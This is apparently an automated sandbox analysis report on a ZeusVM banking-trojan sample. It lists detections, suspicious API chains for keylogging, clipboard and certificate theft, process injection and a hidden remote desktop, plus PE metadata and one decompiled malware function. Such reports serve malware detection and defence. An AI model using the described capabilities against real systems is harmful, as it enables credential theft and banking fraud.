Edit tour

Windows Analysis Report
dmB3aYi8Bo.bin

Overview

General Information

Sample Name:	dmB3aYi8Bo.bin (renamed file extension from bin to exe)
Analysis ID:	691233
MD5:	56aa277081075438c3dbbef841299172
SHA1:	e5870965f41cb82f454043845641ae92b6c6b939
SHA256:	0eab1c5406f415f75ab39dbf3651cee9d41a0e0b6d5bdb51042412b57f0aea05
Tags:	exeunnamed10
Infos:

Detection

ZeusVM

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Detected ZeusVM e-Banking Trojan

Contains VNC / remote desktop functionality (version string found)

Machine Learning detection for sample

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected potential crypto function

May initialize a security null descriptor

Contains functionality to launch a process as a different user

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

dmB3aYi8Bo.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\dmB3aYi8Bo.exe" MD5: 56AA277081075438C3DBBEF841299172)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dmB3aYi8Bo.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: dmB3aYi8Bo.exe	Virustotal: Detection: 57%			Perma Link
Source: dmB3aYi8Bo.exe	ReversingLabs: Detection: 76%

Machine Learning detection for sample

Source: dmB3aYi8Bo.exe

Joe Sandbox ML: detected

Source: 0.0.dmB3aYi8Bo.exe.12b0000.0.unpack	Avira: Label: TR/Spy.Zbot.afkmx
Source: 0.2.dmB3aYi8Bo.exe.12b0000.0.unpack	Avira: Label: TR/Spy.Zbot.afkmx

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B48A2 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,

0_2_012B48A2

Source: dmB3aYi8Bo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012BD399 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_012BD399
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012BD44A FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_012BD44A

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B685D select,recv,

0_2_012B685D

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012CA854 GetKeyboardState,ToUnicode,TranslateMessage,

0_2_012CA854

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012CA8EB GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,

0_2_012CA8EB

E-Banking Fraud

Detected ZeusVM e-Banking Trojan

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B30C0 lstrcmpiA,lstrcmpiA,

0_2_012B30C0

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012D022B OpenDesktopW,CreateDesktopW,

0_2_012D022B

Source: dmB3aYi8Bo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012C80B0 InitiateSystemShutdownExW,ExitWindowsEx,		0_2_012C80B0
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012C1A81 ExitWindowsEx,		0_2_012C1A81

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B6177	0_2_012B6177
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B636F	0_2_012B636F
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B5B49	0_2_012B5B49
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B5D60	0_2_012B5D60
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B5F21	0_2_012B5F21
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012C976D	0_2_012C976D
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B1BC2	0_2_012B1BC2
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012CAFE4	0_2_012CAFE4
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B6601	0_2_012B6601

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012BBAD7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_012BBAD7

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012C2BCD NtQueryInformationProcess,CloseHandle,NtCreateThread,		0_2_012C2BCD
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012C2C77 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,		0_2_012C2C77

Source: dmB3aYi8Bo.exe	Virustotal: Detection: 57%
Source: dmB3aYi8Bo.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012C2F67 CreateToolhelp32Snapshot,Process32FirstW,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,

0_2_012C2F67

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

graph_0-11836

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B4E98 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_012B4E98

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B395D CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_012B395D
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B3813 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		0_2_012B3813

Source: classification engine

Classification label: mal72.bank.troj.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B504C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_012B504C

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_0-11837
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_0-11837

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

API coverage: 1.9 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012BD399 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_012BD399
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012BD44A FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_012BD44A

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012C105D mov edx, dword ptr fs:[00000030h]

0_2_012C105D

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B504C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_012B504C

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B18F2 HeapCreate,GetProcessHeap,

0_2_012B18F2

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012C2D9E LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,LeaveCriticalSection,

0_2_012C2D9E

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B6FBD InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_012B6FBD

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B3E69 GetTimeZoneInformation,

0_2_012B3E69

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012C7B5C GetVersionExW,GetNativeSystemInfo,

0_2_012C7B5C

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012B1B1D PFXImportCertStore,GetSystemTime,

0_2_012B1B1D

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe

Code function: 0_2_012C87ED GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

0_2_012C87ED

Source: dmB3aYi8Bo.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: dmB3aYi8Bo.exe	String found in binary or memory: RFB 003.003
Source: dmB3aYi8Bo.exe	String found in binary or memory: RFB 003.003
Source: dmB3aYi8Bo.exe, 00000000.00000000.311521845.00000000012D7000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: RFB 003.003
Source: dmB3aYi8Bo.exe, 00000000.00000000.311521845.00000000012D7000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: ! RFB 003.003
Source: dmB3aYi8Bo.exe	String found in binary or memory: RFB 003.003
Source: dmB3aYi8Bo.exe	String found in binary or memory: ! RFB 003.003

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B6A4C socket,bind,listen,closesocket,		0_2_012B6A4C
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe	Code function: 0_2_012B1929 socket,bind,closesocket,		0_2_012B1929

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	2 Command and Scripting Interpreter	1 Create Account	1 Valid Accounts	1 Valid Accounts	11 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	11 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	21 Native API	1 Valid Accounts	11 Access Token Manipulation	11 Access Token Manipulation	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Remote Access Software	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Install Root Certificate	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	3 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dmB3aYi8Bo.exe	58%	Virustotal		Browse
dmB3aYi8Bo.exe	77%	ReversingLabs	Win32.Trojan.Zeus
dmB3aYi8Bo.exe	100%	Avira	TR/Spy.Zbot.afkmx
dmB3aYi8Bo.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.dmB3aYi8Bo.exe.12b0000.0.unpack	100%	Avira	TR/Spy.Zbot.afkmx		Download File
0.2.dmB3aYi8Bo.exe.12b0000.0.unpack	100%	Avira	TR/Spy.Zbot.afkmx		Download File

Domains and IPs

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	691233
Start date and time:	2022-08-27 03:52:44 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	dmB3aYi8Bo.bin (renamed file extension from bin to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.bank.troj.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.9% (good quality ratio 95.4%) Quality average: 88.3% Quality standard deviation: 24.3%
HCA Information:	Successful, ratio: 91% Number of executed functions: 7 Number of non-executed functions: 115
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information

Joe Sandbox View / Context

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.974490890199798
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	dmB3aYi8Bo.exe
File size:	187392
MD5:	56aa277081075438c3dbbef841299172
SHA1:	e5870965f41cb82f454043845641ae92b6c6b939
SHA256:	0eab1c5406f415f75ab39dbf3651cee9d41a0e0b6d5bdb51042412b57f0aea05
SHA512:	6f128a1a9d8b1bb96bc7fa92fad1170395b1ce9603168fb1925bbeb1a5d910f0f8b5999eabdcd4b1dacae376d4ff479d878920984ba68d951a46ac7056b7ad69
SSDEEP:	3072:bGVWrMNKUhjhoo7MQW/ieN6RzNLWV+1hpNaL+90tLsVXzJQYMUCb:bGArMNKUhjWl/ieNULu8h39SLSuYMUCb
TLSH:	2E04BF3EB9D15877C86F213149E9B6B432EED730136A49C7E1CD0E0938529E2A739397
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......")..fH..fH..fH..fH..gH..o04.{H..fH..>I...>..zH...>:.gH..RichfH..................PE..L......N.................V.................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x401a1e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:	0x4EF1CD9B [Wed Dec 21 12:14:19 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	f6a985405556b98acbdb7255917b9fb5

Entrypoint Preview

Instruction
jmp 00007F2E38A4556Eh
jmp 00007F2E38A40747h
jmp 00007F2E38A3A3D3h
jmp 00007F2E38A4493Fh
jmp 00007F2E38A49424h
jmp 00007F2E38A45EB6h
jmp 00007F2E38A45C09h
jmp 00007F2E38A4114Dh
jmp 00007F2E38A46240h
jmp 00007F2E38A40FABh
jmp 00007F2E38A4D9F6h
jmp 00007F2E38A3F627h
jmp 00007F2E38A3760Eh
jmp 00007F2E38A52351h
jmp 00007F2E38A4834Fh
jmp 00007F2E38A46C17h
jmp 00007F2E38A4AE0Eh
jmp 00007F2E38A4C913h
jmp 00007F2E38A3D105h
jmp 00007F2E38A379D6h
jmp 00007F2E38A38449h
jmp 00007F2E38A4756Dh
jmp 00007F2E38A40E8Fh
jmp 00007F2E38A515B7h
jmp 00007F2E38A3CCDEh
jmp 00007F2E38A36C3Eh
jmp 00007F2E38A408E5h
jmp 00007F2E38A373DEh
jmp 00007F2E38A3CD9Bh
jmp 00007F2E38A3D1FCh
jmp 00007F2E38A382B8h
jmp 00007F2E38A37061h
jmp 00007F2E38A374CAh
jmp 00007F2E38A3D7D0h
jmp 00007F2E38A3E9A5h
jmp 00007F2E38A54798h
jmp 00007F2E38A3D7E0h
jmp 00007F2E38A403B8h
jmp 00007F2E38A375E4h
jmp 00007F2E38A461A4h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e000	0x12c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31000	0x1350	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e9f8	0x8cc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x21f7b	0x22000	False	0.48848948759191174	data	5.9162227847345825	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
code	0x23000	0x35d1	0x3600	False	0.24254918981481483	data	3.993522758518666	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x27000	0x323c	0x3400	False	0.6225961538461539	data	5.636797675605685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x2a3a	0x600	False	0.150390625	PGP symmetric key encrypted data - Plaintext or unencrypted data	1.1042325865513358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2e000	0x2e8d	0x3000	False	0.3174641927083333	data	4.73911940856972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x31000	0x1649	0x1800	False	0.6793619791666666	data	5.9673223528898065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	SystemTimeToFileTime, WideCharToMultiByte, MultiByteToWideChar, FormatMessageW, OpenProcess, CreateProcessW, FileTimeToDosDateTime, FileTimeToLocalFileTime, GetFileInformationByHandle, GetVolumeNameForVolumeMountPointW, GetOverlappedResult, RemoveDirectoryW, FindClose, FindNextFileW, FindFirstFileW, SetEndOfFile, GetEnvironmentVariableW, DuplicateHandle, CreateEventW, GetModuleFileNameW, SetErrorMode, GetVersionExW, GetCurrentProcessId, GetFileAttributesExW, SetEvent, OpenEventW, lstrcpyW, ExitProcess, MulDiv, InitializeCriticalSection, FlushFileBuffers, GetThreadContext, GetProcessId, LeaveCriticalSection, EnterCriticalSection, CreateRemoteThread, Process32NextW, Process32FirstW, DeleteCriticalSection, GetLocalTime, GetPrivateProfileStringW, GetPrivateProfileIntW, GetNativeSystemInfo, GetUserDefaultUILanguage, MoveFileExW, GlobalUnlock, GlobalLock, GetCurrentThreadId, TlsGetValue, TlsSetValue, TerminateProcess, ResetEvent, MapViewOfFile, CreateFileMappingW, TlsAlloc, UnmapViewOfFile, TlsFree, WaitForMultipleObjects, SetLastError, ExpandEnvironmentStringsW, GetFileAttributesW, CreateDirectoryW, GetFileTime, SetFileTime, GetTempPathW, GetTempFileNameW, SetFileAttributesW, LoadLibraryA, ReadFile, DeleteFileW, SetFilePointerEx, GetFileSizeEx, VirtualAlloc, VirtualFree, CreateFileW, SetFilePointer, WriteFile, VirtualFreeEx, IsBadReadPtr, VirtualAllocEx, VirtualProtectEx, ReadProcessMemory, WriteProcessMemory, SetThreadContext, VirtualQueryEx, OpenMutexW, ReleaseMutex, CreateMutexW, LocalFree, LoadLibraryW, FreeLibrary, CreateThread, GetModuleHandleW, GetProcAddress, GetLastError, CreateToolhelp32Snapshot, Thread32First, Thread32Next, CloseHandle, lstrcmpiW, Sleep, GetTickCount, GetTimeZoneInformation, HeapFree, HeapAlloc, HeapReAlloc, HeapDestroy, HeapCreate, GetProcessHeap, GetSystemTime, lstrcmpiA, GetCurrentThread, SetThreadPriority, GetCommandLineW, WaitForSingleObject
USER32.dll	RegisterClassA, RegisterClassExW, RegisterClassExA, CreateWindowStationW, OpenWindowStationW, SetProcessWindowStation, GetProcessWindowStation, CreateDesktopW, SetThreadDesktop, CloseWindowStation, CloseDesktop, GetUpdateRgn, GetUpdateRect, GetWindowDC, GetDCEx, EndPaint, BeginPaint, IntersectRect, EqualRect, CallWindowProcW, PrintWindow, PeekMessageA, GetMessageA, GetMessageW, GetCapture, ReleaseCapture, SetCapture, SetCursorPos, GetCursorPos, GetMessagePos, GetWindowInfo, GetAncestor, RegisterClassW, GetClassLongW, GetWindowRect, IsRectEmpty, GetParent, MapWindowPoints, SetWindowPos, IsWindow, DefMDIChildProcA, DefMDIChildProcW, DefFrameProcA, DefFrameProcW, DefDlgProcA, DefDlgProcW, DefWindowProcA, SwitchDesktop, OpenDesktopW, OpenInputDesktop, GetMenu, GetMenuItemCount, GetMenuState, HiliteMenuItem, MenuItemFromPoint, EndMenu, GetSubMenu, GetMenuItemRect, TrackPopupMenuEx, FillRect, GetMenuItemID, SetKeyboardState, GetShellWindow, SystemParametersInfoW, DrawEdge, GetUserObjectInformationW, GetWindowThreadProcessId, CallWindowProcA, RegisterWindowMessageW, GetClassNameW, PostThreadMessageW, DefWindowProcW, CharLowerBuffA, CharLowerW, CharLowerA, SendMessageW, MapVirtualKeyW, PostMessageW, GetSystemMetrics, GetClipboardData, GetKeyboardState, ToUnicode, ExitWindowsEx, CharToOemW, GetDC, ReleaseDC, LoadImageW, GetWindowTextLengthW, GetWindowTextW, WindowFromPoint, SendMessageTimeoutW, GetWindowLongW, SetWindowLongW, DispatchMessageW, TranslateMessage, PeekMessageW, MsgWaitForMultipleObjects, CharUpperW, GetWindow, GetTopWindow, GetThreadDesktop
ADVAPI32.dll	CryptReleaseContext, CryptDestroyHash, CryptGetHashParam, CryptHashData, CryptCreateHash, CryptAcquireContextW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, SetSecurityDescriptorSacl, GetSecurityDescriptorSacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, SetNamedSecurityInfoW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegSetValueExW, RegCreateKeyExW, CreateProcessAsUserW, GetLengthSid, ConvertSidToStringSidW, InitiateSystemShutdownExW
SHLWAPI.dll	PathIsURLW, PathQuoteSpacesW, PathRenameExtensionW, PathIsDirectoryW, PathMatchSpecW, UrlUnescapeA, PathAddBackslashW, PathRemoveBackslashW, PathRemoveFileSpecW, PathAddExtensionW, PathFindFileNameW, wvnsprintfA, wvnsprintfW, PathCombineW, PathUnquoteSpacesW, PathSkipRootW, StrCmpNIA, SHDeleteValueW, SHDeleteKeyW, PathIsRelativeW, StrCmpNIW
SHELL32.dll	ShellExecuteW, CommandLineToArgvW, SHGetFolderPathW
Secur32.dll	GetUserNameExW
PSAPI.DLL	EnumProcessModules, GetModuleBaseNameW, GetModuleFileNameExW
ole32.dll	CLSIDFromString, StringFromGUID2
GDI32.dll	RestoreDC, SetViewportOrgEx, SaveDC, GdiFlush, CreateCompatibleDC, SetRectRgn, SelectObject, CreateCompatibleBitmap, DeleteObject, CreateDIBSection, GetObjectW, GetDIBits, DeleteDC, CreateFontIndirectW, GetDeviceCaps
COMCTL32.dll	InitCommonControlsEx
WS2_32.dll	select, send, WSACleanup, WSAStartup, closesocket, connect, recvfrom, sendto, WSASend, getpeername, WSAStringToAddressW, WSAAddressToStringW, getsockname, WSAGetLastError, setsockopt, WSAIoctl, shutdown, accept, WSASetLastError, bind, listen, getaddrinfo, freeaddrinfo, recv, socket
CRYPT32.dll	CertDuplicateCertificateContext, CertDeleteCertificateFromStore, CertOpenSystemStoreW, CertEnumCertificatesInStore, PFXExportCertStoreEx, CertCloseStore, PFXImportCertStore
WININET.dll	GetUrlCacheEntryInfoW, HttpAddRequestHeadersW, HttpSendRequestW, HttpSendRequestExW, HttpSendRequestExA, InternetReadFileExA, InternetQueryDataAvailable, HttpAddRequestHeadersA, InternetCrackUrlA, InternetReadFile, InternetQueryOptionW, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetQueryOptionA, InternetOpenA, InternetSetOptionA, InternetConnectA, InternetCloseHandle, InternetSetStatusCallbackW
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW

Statistics

Disassembly

Reset < >

Analysis Process: dmB3aYi8Bo.exePID: 6564, Parent PID: 4240COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.7%
Total number of Nodes:	103
Total number of Limit Nodes:	9

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E012B6FBD(intOrPtr* __ecx, struct _SECURITY_DESCRIPTOR* __edx) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t30;
				intOrPtr* _t31;

				_t30 = __edx;
				_t31 = __ecx;
				if(InitializeSecurityDescriptor(__edx, 1) == 0 || SetSecurityDescriptorDacl(_t30, 1, 0, 0) == 0) {
					return 0;
				} else {
					_push(0);
					_t19 =  &_v8;
					_push(_t19);
					_push(1);
					_push(L"S:(ML;;NRNWNX;;;LW)"); // executed
					L012D23E8(); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t31 != 0) {
							 *_t31 = 0xc;
							 *(_t31 + 4) = _t30;
							 *((intOrPtr*)(_t31 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(_t30, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x012b6fc6
0x012b6fcb
0x012b6fd5
0x00000000
0x012b6fe8
